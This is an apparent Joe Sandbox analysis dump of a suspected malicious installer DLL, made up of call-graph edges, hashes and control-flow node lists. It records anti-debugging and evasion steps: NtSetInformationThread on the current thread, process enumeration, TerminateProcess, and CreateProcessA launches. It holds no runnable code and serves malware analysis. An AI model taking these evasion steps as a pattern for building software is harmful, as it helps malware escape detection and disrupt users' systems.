__Getctype 6 API calls 100964->100965 100968 6c0c4f45 SetLastError 100964->100968 100967 6c0c4f5d 100965->100967 100966->100964 100967->100968 100969 6c0c4f61 100967->100969 100975 6c0c4fd9 100968->100975 100976 6c0c4fd3 100968->100976 100970 6c0c7755 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 100969->100970 100972 6c0c4f6d 100970->100972 100973 6c0c4f8c 100972->100973 100974 6c0c4f75 100972->100974 100979 6c0c70d2 __Getctype 6 API calls 100973->100979 100977 6c0c70d2 __Getctype 6 API calls 100974->100977 100978 6c0c1039 __Getctype 35 API calls 100975->100978 100976->100946 100976->100949 100980 6c0c4f83 100977->100980 100981 6c0c4fde 100978->100981 100982 6c0c4f98 100979->100982 100985 6c0c4d2b _free HeapFree GetLastError 100980->100985 100983 6c0c4f9c 100982->100983 100986 6c0c4fad 100982->100986 100984 6c0c70d2 __Getctype 6 API calls 100983->100984 100984->100980 100987 6c0c4f89 100985->100987 100988 6c0c4d2b _free HeapFree GetLastError 100986->100988 100987->100968 100989 6c0c4fbf 100988->100989 100989->100968 100990->100884 100991->100891 100993 6c0cbf3d __wsopen_s 100992->100993 101001 6c0d1f00 EnterCriticalSection 100993->101001 100995 6c0cbf4b 100996 6c0cbe95 __wsopen_s 21 API calls 100995->100996 100997 6c0cbf78 100995->100997 100996->100997 101002 6c0cbfb1 LeaveCriticalSection __wsopen_s 100997->101002 100999 6c0cbf9a 100999->100895 101000->100895 101001->100995 101002->100999 101003->100495 101004->100498 101005->100495 101006->100495 101007->100495 101009 6bf8022e 101008->101009 101010 6bf570c4 101009->101010 101015 6c0c1d4b 101009->101015 101010->100508 101012->100509 101013->100511 101014->100513 101016 6c0c1d59 101015->101016 101017 6c0c1d76 101015->101017 101016->101017 101018 6c0c1d7a 101016->101018 101019 6c0c1d66 101016->101019 101017->101009 101023 6c0c1f72 101018->101023 101031 6c0c0690 18 API calls __cftoe 101019->101031 101024 6c0c1f7e __wsopen_s 101023->101024 101032 6c0bcb19 EnterCriticalSection 101024->101032 101026 6c0c1f8c 101033 6c0c1f2f 101026->101033 101030 6c0c1dac 101030->101009 101031->101017 101032->101026 101041 6c0c8b16 101033->101041 101039 6c0c1f69 101040 6c0c1fc1 LeaveCriticalSection 101039->101040 101040->101030 101042 6c0ca1d0 18 API calls 101041->101042 101043 6c0c8b27 101042->101043 101044 6c0d1f55 __wsopen_s 18 API calls 101043->101044 101045 6c0c8b2d __wsopen_s 101044->101045 101046 6c0c1f43 101045->101046 101058 6c0c4d2b HeapFree GetLastError __dosmaperr 101045->101058 101048 6c0c1dae 101046->101048 101050 6c0c1dc0 101048->101050 101052 6c0c1dde 101048->101052 101049 6c0c1dce 101059 6c0c0690 18 API calls __cftoe 101049->101059 101050->101049 101050->101052 101055 6c0c1df6 _Yarn 101050->101055 101057 6c0c8bc9 62 API calls 101052->101057 101053 6c0c1229 62 API calls 101053->101055 101054 6c0ca1d0 18 API calls 101054->101055 101055->101052 101055->101053 101055->101054 101056 6c0cc0dc __wsopen_s 62 API calls 101055->101056 101056->101055 101057->101039 101058->101046 101059->101052 101061 6c0b6595 101060->101061 101062 6bf82020 52 API calls 101061->101062 101063 6c0b6636 101062->101063 101064 6c0b6fb3 std::_Facet_Register 4 API calls 101063->101064 101065 6c0b666e 101064->101065 101066 6c0b7897 43 API calls 101065->101066 101067 6c0b6682 101066->101067 101068 6bf81d90 89 API calls 101067->101068 101069 6c0b672b 101068->101069 101070 6c0b675c 101069->101070 101112 6bf82250 30 API calls 101069->101112 101070->100529 101072 6c0b6796 101113 6bf826e0 24 API calls 4 library calls 101072->101113 101074 6c0b67a8 101114 6c0b98e9 RaiseException 101074->101114 101076 6c0b67bd 101077 6bf7e010 67 API calls 101076->101077 101078 6c0b67cf 101077->101078 101078->100529 101080 6c0b68fd 101079->101080 101115 6c0b6b10 101080->101115 101082 6c0b69ec 101082->100531 101085 6c0b6915 101085->101082 101133 6bf82250 30 API calls 101085->101133 101134 6bf826e0 24 API calls 4 library calls 101085->101134 101135 6c0b98e9 RaiseException 101085->101135 101088 6bf923af 101087->101088 101091 6bf923c3 101088->101091 101144 6bf83560 32 API calls std::_Xinvalid_argument 101088->101144 101093 6bf9247e 101091->101093 101146 6bf82250 30 API calls 101091->101146 101147 6bf826e0 24 API calls 4 library calls 101091->101147 101148 6c0b98e9 RaiseException 101091->101148 101094 6bf92491 101093->101094 101145 6bf837e0 32 API calls std::_Xinvalid_argument 101093->101145 101094->100531 101098 6c0b610e 101097->101098 101101 6c0b6141 101097->101101 101099 6bf801f0 64 API calls 101098->101099 101102 6c0b6134 101099->101102 101100 6c0b61f3 101100->100540 101101->101100 101149 6bf82250 30 API calls 101101->101149 101104 6c0c1088 67 API calls 101102->101104 101104->101101 101105 6c0b621e 101150 6bf82340 24 API calls 101105->101150 101107 6c0b622e 101151 6c0b98e9 RaiseException 101107->101151 101109 6c0b6239 101110 6bf7e010 67 API calls 101109->101110 101111 6c0b6292 std::ios_base::_Ios_base_dtor 101110->101111 101111->100540 101112->101072 101113->101074 101114->101076 101116 6c0b6b78 101115->101116 101117 6c0b6b4c 101115->101117 101120 6c0b6b89 101116->101120 101136 6bf83560 32 API calls std::_Xinvalid_argument 101116->101136 101119 6c0b6b71 101117->101119 101138 6bf82250 30 API calls 101117->101138 101119->101085 101120->101119 101137 6bf82f60 42 API calls 4 library calls 101120->101137 101122 6c0b6d58 101139 6bf82340 24 API calls 101122->101139 101124 6c0b6d67 101140 6c0b98e9 RaiseException 101124->101140 101128 6c0b6d97 101142 6bf82340 24 API calls 101128->101142 101130 6c0b6dad 101143 6c0b98e9 RaiseException 101130->101143 101132 6c0b6bc3 101132->101119 101141 6bf82250 30 API calls 101132->101141 101133->101085 101134->101085 101135->101085 101136->101120 101137->101132 101138->101122 101139->101124 101140->101132 101141->101128 101142->101130 101143->101119 101144->101091 101145->101094 101146->101091 101147->101091 101148->101091 101149->101105 101150->101107 101151->101109 101152 6bf33d62 101154 6bf33bc0 101152->101154 101153 6bf33e8a GetCurrentThread NtSetInformationThread 101155 6bf33eea 101153->101155 101154->101153 101156 6bf44a27 101157 6bf44a5d _strlen 101156->101157 101158 6bf5639e 101157->101158 101159 6bf45b6f 101157->101159 101160 6bf45b58 101157->101160 101164 6bf45b09 _Yarn 101157->101164 101247 6c0c06a0 18 API calls 2 library calls 101158->101247 101163 6c0b6fb3 std::_Facet_Register 4 API calls 101159->101163 101162 6c0b6fb3 std::_Facet_Register 4 API calls 101160->101162 101162->101164 101163->101164 101165 6c0ab430 FindFirstFileA 101164->101165 101167 6bf45bad std::ios_base::_Ios_base_dtor 101165->101167 101166 6c0b5560 4 API calls 101176 6bf461cb _strlen 101166->101176 101167->101158 101167->101166 101171 6bf49ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 101167->101171 101168 6c0b6fb3 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101168->101171 101169 6c0ab430 FindFirstFileA 101169->101171 101170 6bf4a292 Sleep 101245 6bf49bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 101170->101245 101171->101158 101171->101168 101171->101169 101171->101170 101189 6bf4e619 101171->101189 101172 6bf46624 101175 6c0b6fb3 std::_Facet_Register 4 API calls 101172->101175 101173 6bf4660d 101174 6c0b6fb3 std::_Facet_Register 4 API calls 101173->101174 101181 6bf465bc _Yarn _strlen 101174->101181 101175->101181 101176->101158 101176->101172 101176->101173 101176->101181 101177 6bf563b2 101248 6bf315e0 18 API calls std::ios_base::_Ios_base_dtor 101177->101248 101178 6bf49bbd GetCurrentProcess TerminateProcess 101178->101171 101180 6bf564f8 101181->101177 101182 6bf46970 101181->101182 101183 6bf46989 101181->101183 101186 6bf46920 _Yarn 101181->101186 101184 6c0b6fb3 std::_Facet_Register 4 API calls 101182->101184 101185 6c0b6fb3 std::_Facet_Register 4 API calls 101183->101185 101184->101186 101185->101186 101187 6c0b5ed0 104 API calls 101186->101187 101190 6bf469d6 std::ios_base::_Ios_base_dtor _strlen 101187->101190 101188 6bf4f243 CreateFileA 101204 6bf4f2a7 101188->101204 101189->101188 101190->101158 101191 6bf46dd2 101190->101191 101192 6bf46dbb 101190->101192 101205 6bf46d69 _Yarn _strlen 101190->101205 101196 6c0b6fb3 std::_Facet_Register 4 API calls 101191->101196 101195 6c0b6fb3 std::_Facet_Register 4 API calls 101192->101195 101193 6bf502ca 101194 6c0b6fb3 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101194->101245 101195->101205 101196->101205 101197 6bf47427 101199 6c0b6fb3 std::_Facet_Register 4 API calls 101197->101199 101198 6bf47440 101200 6c0b6fb3 std::_Facet_Register 4 API calls 101198->101200 101201 6bf473da _Yarn 101199->101201 101200->101201 101202 6c0b5ed0 104 API calls 101201->101202 101206 6bf4748d std::ios_base::_Ios_base_dtor _strlen 101202->101206 101203 6bf502ac GetCurrentProcess TerminateProcess 101203->101193 101204->101193 101204->101203 101205->101177 101205->101197 101205->101198 101205->101201 101206->101158 101207 6bf47991 101206->101207 101208 6bf479a8 101206->101208 101213 6bf47940 _Yarn _strlen 101206->101213 101209 6c0b6fb3 std::_Facet_Register 4 API calls 101207->101209 101210 6c0b6fb3 std::_Facet_Register 4 API calls 101208->101210 101209->101213 101210->101213 101211 6bf47de2 101215 6c0b6fb3 std::_Facet_Register 4 API calls 101211->101215 101212 6bf47dc9 101214 6c0b6fb3 std::_Facet_Register 4 API calls 101212->101214 101213->101177 101213->101211 101213->101212 101216 6bf47d7c _Yarn 101213->101216 101214->101216 101215->101216 101217 6c0b5ed0 104 API calls 101216->101217 101218 6bf47e2f std::ios_base::_Ios_base_dtor _strlen 101217->101218 101218->101158 101219 6bf485bf 101218->101219 101220 6bf485a8 101218->101220 101228 6bf48556 _Yarn _strlen 101218->101228 101222 6c0b6fb3 std::_Facet_Register 4 API calls 101219->101222 101221 6c0b6fb3 std::_Facet_Register 4 API calls 101220->101221 101221->101228 101222->101228 101223 6bf48983 101226 6c0b6fb3 std::_Facet_Register 4 API calls 101223->101226 101224 6bf4896a 101225 6c0b6fb3 std::_Facet_Register 4 API calls 101224->101225 101227 6bf4891d _Yarn 101225->101227 101226->101227 101229 6c0b5ed0 104 API calls 101227->101229 101228->101177 101228->101223 101228->101224 101228->101227 101230 6bf489d0 std::ios_base::_Ios_base_dtor _strlen 101229->101230 101230->101158 101231 6bf48f36 101230->101231 101232 6bf48f1f 101230->101232 101237 6bf48ecd _Yarn _strlen 101230->101237 101234 6c0b6fb3 std::_Facet_Register 4 API calls 101231->101234 101233 6c0b6fb3 std::_Facet_Register 4 API calls 101232->101233 101233->101237 101234->101237 101235 6bf49354 101238 6c0b6fb3 std::_Facet_Register 4 API calls 101235->101238 101236 6bf4936d 101239 6c0b6fb3 std::_Facet_Register 4 API calls 101236->101239 101237->101177 101237->101235 101237->101236 101240 6bf49307 _Yarn 101237->101240 101238->101240 101239->101240 101241 6c0b5ed0 104 API calls 101240->101241 101243 6bf493ba std::ios_base::_Ios_base_dtor 101241->101243 101242 6c0b5560 4 API calls 101242->101171 101243->101158 101243->101242 101244 6c0b5ed0 104 API calls 101244->101245 101245->101158 101245->101171 101245->101177 101245->101178 101245->101194 101245->101244 101246 6c0b5560 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 101245->101246 101246->101245 101248->101180 101249 6c0bf4af 101250 6c0bf4bb __wsopen_s 101249->101250 101251 6c0bf4cf 101250->101251 101252 6c0bf4c2 GetLastError ExitThread 101250->101252 101253 6c0c4f22 __Getctype 37 API calls 101251->101253 101254 6c0bf4d4 101253->101254 101261 6c0ca2d6 101254->101261 101256 6c0bf4eb 101267 6c0bf41a 16 API calls 2 library calls 101256->101267 101260 6c0bf50d 101262 6c0ca2e8 GetPEB 101261->101262 101263 6c0bf4df 101261->101263 101262->101263 101264 6c0ca2fb 101262->101264 101263->101256 101266 6c0c72df 5 API calls std::_Lockit::_Lockit 101263->101266 101268 6c0c7388 5 API calls std::_Lockit::_Lockit 101264->101268 101266->101256 101267->101260 101268->101263 101269 6bf43b72 101270 6c0b6fb3 std::_Facet_Register 4 API calls 101269->101270 101278 6bf437e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 101270->101278 101271 6c0ab430 FindFirstFileA 101271->101278 101272 6bf5639e 101282 6c0c06a0 18 API calls 2 library calls 101272->101282 101274 6bf56ba0 104 API calls 101274->101278 101275 6bf56e60 32 API calls 101275->101278 101276 6bf57090 77 API calls 101276->101278 101277 6bf7e010 67 API calls 101277->101278 101278->101271 101278->101272 101278->101274 101278->101275 101278->101276 101278->101277 101283 6bf4f8a3 101285 6bf4f887 101283->101285 101284 6bf502ac GetCurrentProcess TerminateProcess 101286 6bf502ca 101284->101286 101285->101284 101287 6c0cd043 101288 6c0cd055 __dosmaperr 101287->101288 101289 6c0cd06d 101287->101289 101289->101288 101290 6c0cd0e7 101289->101290 101293 6c0cd0b8 __dosmaperr 101289->101293 101292 6c0cd100 101290->101292 101294 6c0cd157 __wsopen_s 101290->101294 101295 6c0cd11b __dosmaperr 101290->101295 101292->101295 101315 6c0cd105 101292->101315 101329 6c0c0690 18 API calls __cftoe 101293->101329 101323 6c0c4d2b HeapFree GetLastError __dosmaperr 101294->101323 101322 6c0c0690 18 API calls __cftoe 101295->101322 101296 6c0d1f55 __wsopen_s 18 API calls 101298 6c0cd2ae 101296->101298 101301 6c0cd324 101298->101301 101304 6c0cd2c7 GetConsoleMode 101298->101304 101299 6c0cd177 101324 6c0c4d2b HeapFree GetLastError __dosmaperr 101299->101324 101303 6c0cd328 ReadFile 101301->101303 101306 6c0cd39c GetLastError 101303->101306 101307 6c0cd342 101303->101307 101304->101301 101308 6c0cd2d8 101304->101308 101305 6c0cd17e 101311 6c0cd132 __dosmaperr __wsopen_s 101305->101311 101325 6c0cb1d9 20 API calls __wsopen_s 101305->101325 101306->101311 101307->101306 101313 6c0cd319 101307->101313 101308->101303 101309 6c0cd2de ReadConsoleW 101308->101309 101309->101313 101314 6c0cd2fa GetLastError 101309->101314 101326 6c0c4d2b HeapFree GetLastError __dosmaperr 101311->101326 101313->101311 101316 6c0cd37e 101313->101316 101317 6c0cd367 101313->101317 101314->101311 101315->101296 101316->101311 101318 6c0cd395 101316->101318 101327 6c0cd46e 23 API calls 3 library calls 101317->101327 101328 6c0cd726 21 API calls __wsopen_s 101318->101328 101321 6c0cd39a 101321->101311 101322->101311 101323->101299 101324->101305 101325->101315 101326->101288 101327->101311 101328->101321 101329->101288

                            Executed Functions

                            Function 6BF34754 Relevance: 69.2, APIs: 28, Strings: 1, Instructions: 18471COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: HR^
                            • API String ID: 4218353326-1341859651
                            • Opcode ID: cf331f166b1c8fe20b05ee52023a42077380e29563e3f354f4c22fff3130a6e4
                            • Instruction ID: d0c6ab674e5058f5ff3212f5822196d0315a475951abec339a2b74ef11c52e2c
                            • Opcode Fuzzy Hash: cf331f166b1c8fe20b05ee52023a42077380e29563e3f354f4c22fff3130a6e4
                            • Instruction Fuzzy Hash: AF74F772644B018FC728CF28C8D0695B7F3EF95314B198A6DC0D68B765EB78B54ACB90
                            Function 6BF44A27 Relevance: 61.3, APIs: 25, Strings: 3, Instructions: 12265COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: }jk$;T55$L@^
                            • API String ID: 0-4218709813
                            • Opcode ID: 721ecaea613e7fb9418d86b5971208a9b91b95a6e0d286f10592200f9ed489bb
                            • Instruction ID: 894685dc2a8bab9efc3f5000ed9b6a3703b23fee56bf41c84c4add65dc5b1a5d
                            • Opcode Fuzzy Hash: 721ecaea613e7fb9418d86b5971208a9b91b95a6e0d286f10592200f9ed489bb
                            • Instruction Fuzzy Hash: D134D9726447018FC728CF28C8D0696BBF3EF95314B198A6DC0D64B766EB78B54ACB50
                            Function 6C0B57B0 Relevance: 6.1, APIs: 4, Instructions: 95processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7702 6c0b57b0-6c0b57e5 CreateToolhelp32Snapshot 7703 6c0b5810-6c0b5819 7702->7703 7704 6c0b581b-6c0b5820 7703->7704 7705 6c0b5850-6c0b5855 7703->7705 7706 6c0b5822-6c0b5827 7704->7706 7707 6c0b5885-6c0b588a 7704->7707 7708 6c0b585b-6c0b5860 7705->7708 7709 6c0b58e7-6c0b5911 call 6c0c3175 7705->7709 7711 6c0b5829-6c0b582e 7706->7711 7712 6c0b58a4-6c0b58cd call 6c0bbe90 Process32FirstW 7706->7712 7715 6c0b5890-6c0b58a2 Process32NextW 7707->7715 7716 6c0b5916-6c0b591b 7707->7716 7713 6c0b5862-6c0b5867 7708->7713 7714 6c0b57e7-6c0b5802 CloseHandle 7708->7714 7709->7703 7711->7703 7720 6c0b5830-6c0b5841 7711->7720 7722 6c0b58d2-6c0b58e2 7712->7722 7713->7703 7721 6c0b5869-6c0b5883 7713->7721 7714->7703 7715->7722 7716->7703 7719 6c0b5921-6c0b592f 7716->7719 7720->7703 7721->7703 7722->7703
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C0B57BE
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: CreateSnapshotToolhelp32
                            • String ID:
                            • API String ID: 3332741929-0
                            • Opcode ID: f30db2f3ef4569c30f32fcb586ecb9f2b11b6dc3121716111b7fb49b7e7b012a
                            • Instruction ID: a7cfdf900fd4645ee573208383983f588f2019db2537e88b21effad2eb88635e
                            • Opcode Fuzzy Hash: f30db2f3ef4569c30f32fcb586ecb9f2b11b6dc3121716111b7fb49b7e7b012a
                            • Instruction Fuzzy Hash: 67314D78608300EFD711DF28C889B0ABBF4AF99744F508D6EE498F7760D37298598B52
                            Function 6BF33886 Relevance: 3.6, APIs: 2, Instructions: 573COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7821 6bf33886-6bf3388e 7822 6bf33970-6bf3397d 7821->7822 7823 6bf33894-6bf33896 7821->7823 7825 6bf339f1-6bf339f8 7822->7825 7826 6bf3397f-6bf33989 7822->7826 7823->7822 7824 6bf3389c-6bf338b9 7823->7824 7829 6bf338c0-6bf338c1 7824->7829 7827 6bf33ab5-6bf33aba 7825->7827 7828 6bf339fe-6bf33a03 7825->7828 7826->7824 7830 6bf3398f-6bf33994 7826->7830 7827->7824 7834 6bf33ac0-6bf33ac7 7827->7834 7831 6bf338d2-6bf338d4 7828->7831 7832 6bf33a09-6bf33a2f 7828->7832 7833 6bf3395e 7829->7833 7835 6bf33b16-6bf33b18 7830->7835 7836 6bf3399a-6bf3399f 7830->7836 7839 6bf33957-6bf3395c 7831->7839 7837 6bf33a35-6bf33a3a 7832->7837 7838 6bf338f8-6bf33955 7832->7838 7841 6bf33960-6bf33964 7833->7841 7834->7829 7840 6bf33acd-6bf33ad6 7834->7840 7835->7829 7842 6bf339a5-6bf339bf 7836->7842 7843 6bf3383b-6bf33855 call 6c0819e0 call 6c0819f0 7836->7843 7844 6bf33a40-6bf33a57 7837->7844 7845 6bf33b1d-6bf33b22 7837->7845 7838->7839 7839->7833 7840->7835 7848 6bf33ad8-6bf33aeb 7840->7848 7846 6bf33860-6bf33885 7841->7846 7847 6bf3396a 7841->7847 7850 6bf33a5a-6bf33a5d 7842->7850 7843->7846 7844->7850 7856 6bf33b24-6bf33b44 7845->7856 7857 6bf33b49-6bf33b50 7845->7857 7846->7821 7853 6bf33ba1-6bf33bb6 7847->7853 7848->7838 7854 6bf33af1-6bf33af8 7848->7854 7851 6bf33a87-6bf33aa7 7850->7851 7852 6bf33aa9-6bf33ab0 7850->7852 7851->7852 7852->7841 7861 6bf33bc0-6bf33bda call 6c0819e0 call 6c0819f0 7853->7861 7862 6bf33b62-6bf33b85 7854->7862 7863 6bf33afa-6bf33aff 7854->7863 7856->7851 7857->7829 7859 6bf33b56-6bf33b5d 7857->7859 7859->7841 7872 6bf33be0-6bf33bfe 7861->7872 7862->7838 7866 6bf33b8b 7862->7866 7863->7839 7866->7853 7875 6bf33c04-6bf33c11 7872->7875 7876 6bf33e7b 7872->7876 7877 6bf33ce0-6bf33cea 7875->7877 7878 6bf33c17-6bf33c20 7875->7878 7879 6bf33e81-6bf33ee0 call 6bf33750 GetCurrentThread NtSetInformationThread 7876->7879 7882 6bf33d3a-6bf33d3c 7877->7882 7883 6bf33cec-6bf33d0c 7877->7883 7880 6bf33c26-6bf33c2d 7878->7880 7881 6bf33dc5 7878->7881 7898 6bf33eea-6bf33f04 call 6c0819e0 call 6c0819f0 7879->7898 7886 6bf33dc3 7880->7886 7887 6bf33c33-6bf33c3a 7880->7887 7885 6bf33dc6 7881->7885 7889 6bf33d70-6bf33d8d 7882->7889 7890 6bf33d3e-6bf33d45 7882->7890 7888 6bf33d90-6bf33d95 7883->7888 7892 6bf33dc8-6bf33dcc 7885->7892 7886->7881 7893 6bf33c40-6bf33c5b 7887->7893 7894 6bf33e26-6bf33e2b 7887->7894 7896 6bf33d97-6bf33db8 7888->7896 7897 6bf33dba-6bf33dc1 7888->7897 7889->7888 7895 6bf33d50-6bf33d57 7890->7895 7892->7872 7903 6bf33dd2 7892->7903 7902 6bf33e1b-6bf33e24 7893->7902 7900 6bf33e31 7894->7900 7901 6bf33c7b-6bf33cd0 7894->7901 7895->7885 7896->7881 7897->7886 7904 6bf33dd7-6bf33ddc 7897->7904 7915 6bf33f75-6bf33fa1 7898->7915 7900->7861 7901->7895 7902->7892 7908 6bf33e76-6bf33e79 7903->7908 7906 6bf33e36-6bf33e3d 7904->7906 7907 6bf33dde-6bf33e17 7904->7907 7911 6bf33e3f-6bf33e5a 7906->7911 7912 6bf33e5c-6bf33e5f 7906->7912 7907->7902 7908->7879 7911->7902 7912->7901 7914 6bf33e65-6bf33e69 7912->7914 7914->7892 7914->7908 7919 6bf33fa3-6bf33fa8 7915->7919 7920 6bf34020-6bf34026 7915->7920 7923 6bf33fae-6bf33fcf 7919->7923 7924 6bf3407c-6bf34081 7919->7924 7921 6bf33f06-6bf33f35 7920->7921 7922 6bf3402c-6bf3403c 7920->7922 7929 6bf33f38-6bf33f61 7921->7929 7925 6bf340b3-6bf340b8 7922->7925 7926 6bf3403e-6bf34058 7922->7926 7928 6bf340aa-6bf340ae 7923->7928 7927 6bf34083-6bf3408a 7924->7927 7924->7928 7925->7923 7932 6bf340be-6bf340c9 7925->7932 7930 6bf3405a-6bf34063 7926->7930 7927->7929 7931 6bf34090 7927->7931 7933 6bf33f6b-6bf33f6f 7928->7933 7934 6bf33f64-6bf33f67 7929->7934 7936 6bf340f5-6bf3413f 7930->7936 7937 6bf34069-6bf3406c 7930->7937 7931->7898 7932->7928 7938 6bf340cb-6bf340d4 7932->7938 7933->7915 7935 6bf33f69 7934->7935 7935->7933 7936->7935 7940 6bf34072-6bf34077 7937->7940 7941 6bf34144-6bf3414b 7937->7941 7942 6bf340a7 7938->7942 7943 6bf340d6-6bf340f0 7938->7943 7940->7934 7941->7933 7942->7928 7943->7930
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 76db5ff662f416661eb85cfa15aa9eccf1900e9e6f59a691e7b5381df3668479
                            • Instruction ID: 7807f0ee11e6fe06a92e8b02ffe1b94fa40b8bad8824c488d5efa99cafd4648b
                            • Opcode Fuzzy Hash: 76db5ff662f416661eb85cfa15aa9eccf1900e9e6f59a691e7b5381df3668479
                            • Instruction Fuzzy Hash: 4032D233644B118FC334CF28C890695B7E3EFD13147698A6CC0EA5B6A5D779B44ACB90
                            Function 6BF33A6A Relevance: 3.1, APIs: 2, Instructions: 148threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7969 6bf33a6a-6bf33a85 7970 6bf33a87-6bf33aa7 7969->7970 7971 6bf33aa9-6bf33ab0 7970->7971 7972 6bf33960-6bf33964 7971->7972 7973 6bf33860-6bf3388e 7972->7973 7974 6bf3396a 7972->7974 7983 6bf33970-6bf3397d 7973->7983 7984 6bf33894-6bf33896 7973->7984 7975 6bf33ba1-6bf33bb6 7974->7975 7978 6bf33bc0-6bf33bda call 6c0819e0 call 6c0819f0 7975->7978 7992 6bf33be0-6bf33bfe 7978->7992 7987 6bf339f1-6bf339f8 7983->7987 7988 6bf3397f-6bf33989 7983->7988 7984->7983 7986 6bf3389c-6bf338b9 7984->7986 7993 6bf338c0-6bf338c1 7986->7993 7990 6bf33ab5-6bf33aba 7987->7990 7991 6bf339fe-6bf33a03 7987->7991 7988->7986 7994 6bf3398f-6bf33994 7988->7994 7990->7986 7999 6bf33ac0-6bf33ac7 7990->7999 7995 6bf338d2-6bf338d4 7991->7995 7996 6bf33a09-6bf33a2f 7991->7996 8011 6bf33c04-6bf33c11 7992->8011 8012 6bf33e7b 7992->8012 7998 6bf3395e 7993->7998 8000 6bf33b16-6bf33b18 7994->8000 8001 6bf3399a-6bf3399f 7994->8001 8005 6bf33957-6bf3395c 7995->8005 8002 6bf33a35-6bf33a3a 7996->8002 8003 6bf338f8-6bf33955 7996->8003 7998->7972 7999->7993 8006 6bf33acd-6bf33ad6 7999->8006 8000->7993 8007 6bf339a5-6bf339bf 8001->8007 8008 6bf3383b-6bf33855 call 6c0819e0 call 6c0819f0 8001->8008 8009 6bf33a40-6bf33a57 8002->8009 8010 6bf33b1d-6bf33b22 8002->8010 8003->8005 8005->7998 8006->8000 8013 6bf33ad8-6bf33aeb 8006->8013 8015 6bf33a5a-6bf33a5d 8007->8015 8008->7973 8009->8015 8021 6bf33b24-6bf33b44 8010->8021 8022 6bf33b49-6bf33b50 8010->8022 8016 6bf33ce0-6bf33cea 8011->8016 8017 6bf33c17-6bf33c20 8011->8017 8019 6bf33e81-6bf33ee0 call 6bf33750 GetCurrentThread NtSetInformationThread 8012->8019 